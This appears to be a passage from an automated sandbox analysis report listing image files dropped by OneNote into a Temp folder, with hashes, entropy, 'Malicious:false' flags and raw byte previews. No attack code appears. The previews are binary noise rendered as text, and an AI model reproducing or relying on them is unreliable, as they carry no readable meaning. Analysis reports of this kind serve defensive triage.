                                                                                                                                            File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12180
                                                                                                                                            Entropy (8bit):5.318266117301791
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                                                            MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                                                            SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                                                            SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                                                            SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3F4496DC-9A30-41F9-AF67-D548B6AFA1D4}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52912
                                                                                                                                            Entropy (8bit):7.679147474806877
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                                                            MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                                                            SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                                                            SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                                                            SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3F6E38B1-1053-4316-AC19-B2942F88B224}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{40615DD9-037A-4787-9009-4A07A211C156}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60924
                                                                                                                                            Entropy (8bit):7.758472758205366
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                                                            MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                                                            SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                                                            SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                                                            SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{425C160A-B4C8-4C82-AAD5-24F91B9C7305}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{43034417-4F75-4BD7-98B2-D572ED3365F1}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{43DCD036-2A5B-4FB5-BCA1-076F8F462D3B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{43ED92F0-60B9-4807-BAFC-2E8C0B157207}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{44C9E2FD-9240-4BC5-98BE-0EE7A2EB9F8D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{453AF477-6DF1-465E-B756-204794A6438D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{47D62AAF-92AB-489D-84A0-EAD0E843CEB8}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4844FFF9-CF90-464C-A300-9BD080E4340C}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40884
                                                                                                                                            Entropy (8bit):7.545929039957292
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                            MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                            SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                            SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                            SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{49EC2D9B-2FDD-4998-8E89-AFCF4C2C13CE}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4BF7D812-F9F2-4E60-B01A-675C32296668}

                                                                                                                                            Download File
